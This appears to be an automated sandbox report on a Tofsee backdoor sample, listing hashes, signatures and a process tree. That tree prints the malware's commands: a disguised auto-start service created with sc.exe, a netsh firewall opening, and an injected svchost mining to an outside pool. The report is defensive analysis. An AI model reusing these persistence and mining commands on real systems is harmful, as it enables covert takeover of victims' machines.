Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-11-2020 16:08

General

  • Target

    a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7.exe

  • Size

    12.1MB

  • MD5

    2809f01d292e0f6cf6dbb1e1237fe0bc

  • SHA1

    11164003530c82681901facb41627295398ae78f

  • SHA256

    a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7

  • SHA512

    f12c24a726f92256544151176302fe318cfd8d20fe8719b9b5c4590e8681ed5918b674a152f00a646b1eb0fb972a250ab9eeb5616ee8c341b72e4c336724c273

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7.exe
    "C:\Users\Admin\AppData\Local\Temp\a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1160
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ledcpkzh\
      2⤵
      PID:1416
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uthjxuvn.exe" C:\Windows\SysWOW64\ledcpkzh\
      2⤵
      PID:2964
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create ledcpkzh binPath= "C:\Windows\SysWOW64\ledcpkzh\uthjxuvn.exe /d\"C:\Users\Admin\AppData\Local\Temp\a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:3416
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description ledcpkzh "wifi internet conection"
      2⤵
      PID:2072
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start ledcpkzh
      2⤵
      PID:3780
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      PID:2112
  • C:\Windows\SysWOW64\ledcpkzh\uthjxuvn.exe
    C:\Windows\SysWOW64\ledcpkzh\uthjxuvn.exe /d"C:\Users\Admin\AppData\Local\Temp\a2a4f8e26d4c880ba8584c22ae531a07842fec20c72295cb8e6eaa7d507ef7f7.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Modifies service
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3280

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\uthjxuvn.exe

    MD5

    6b5aacf6a1f41ab80a2019055520ebe7

    SHA1

    e60f067feeddf939551f336bc27df2efde55cbc9

    SHA256

    ab65ef811193c7e2cd4ff4ff3ce6c534b416850a80e940f4d877e816b8d3e076

    SHA512

    d78fe9ca29ff711b59632924d9ff436589c69c4b499654bb349dfbe55fb7ebea5470063994cec44f78a7b47c2e9efc8238f645cb77d8aba71fc426d35758f3cd

  • C:\Windows\SysWOW64\ledcpkzh\uthjxuvn.exe

    MD5

    6b5aacf6a1f41ab80a2019055520ebe7

    SHA1

    e60f067feeddf939551f336bc27df2efde55cbc9

    SHA256

    ab65ef811193c7e2cd4ff4ff3ce6c534b416850a80e940f4d877e816b8d3e076

    SHA512

    d78fe9ca29ff711b59632924d9ff436589c69c4b499654bb349dfbe55fb7ebea5470063994cec44f78a7b47c2e9efc8238f645cb77d8aba71fc426d35758f3cd

  • memory/1160-0-0x0000000000839000-0x000000000083A000-memory.dmp

    Filesize

    4KB

  • memory/1160-1-0x0000000002390000-0x0000000002391000-memory.dmp

    Filesize

    4KB

  • memory/1416-2-0x0000000000000000-mapping.dmp

  • memory/2004-17-0x0000000002FD0000-0x0000000002FE0000-memory.dmp

    Filesize

    64KB

  • memory/2004-19-0x00000000094D0000-0x00000000098DB000-memory.dmp

    Filesize

    4.0MB

  • memory/2004-18-0x00000000036F0000-0x00000000036F5000-memory.dmp

    Filesize

    20KB

  • memory/2004-20-0x0000000003F00000-0x0000000003F07000-memory.dmp

    Filesize

    28KB

  • memory/2004-16-0x0000000002CF0000-0x0000000002CF6000-memory.dmp

    Filesize

    24KB

  • memory/2004-12-0x00000000029E0000-0x00000000029F5000-memory.dmp

    Filesize

    84KB

  • memory/2004-13-0x00000000029E9A6B-mapping.dmp

  • memory/2004-14-0x00000000029E0000-0x00000000029F5000-memory.dmp

    Filesize

    84KB

  • memory/2004-15-0x0000000004A50000-0x0000000004C5F000-memory.dmp

    Filesize

    2.1MB

  • memory/2072-6-0x0000000000000000-mapping.dmp

  • memory/2112-9-0x0000000000000000-mapping.dmp

  • memory/2252-10-0x00000000005A4000-0x00000000005A5000-memory.dmp

    Filesize

    4KB

  • memory/2252-11-0x0000000001010000-0x0000000001011000-memory.dmp

    Filesize

    4KB

  • memory/2964-3-0x0000000000000000-mapping.dmp

  • memory/3280-21-0x0000000002D00000-0x0000000002DF1000-memory.dmp

    Filesize

    964KB

  • memory/3280-23-0x0000000002D9259C-mapping.dmp

  • memory/3416-5-0x0000000000000000-mapping.dmp

  • memory/3780-7-0x0000000000000000-mapping.dmp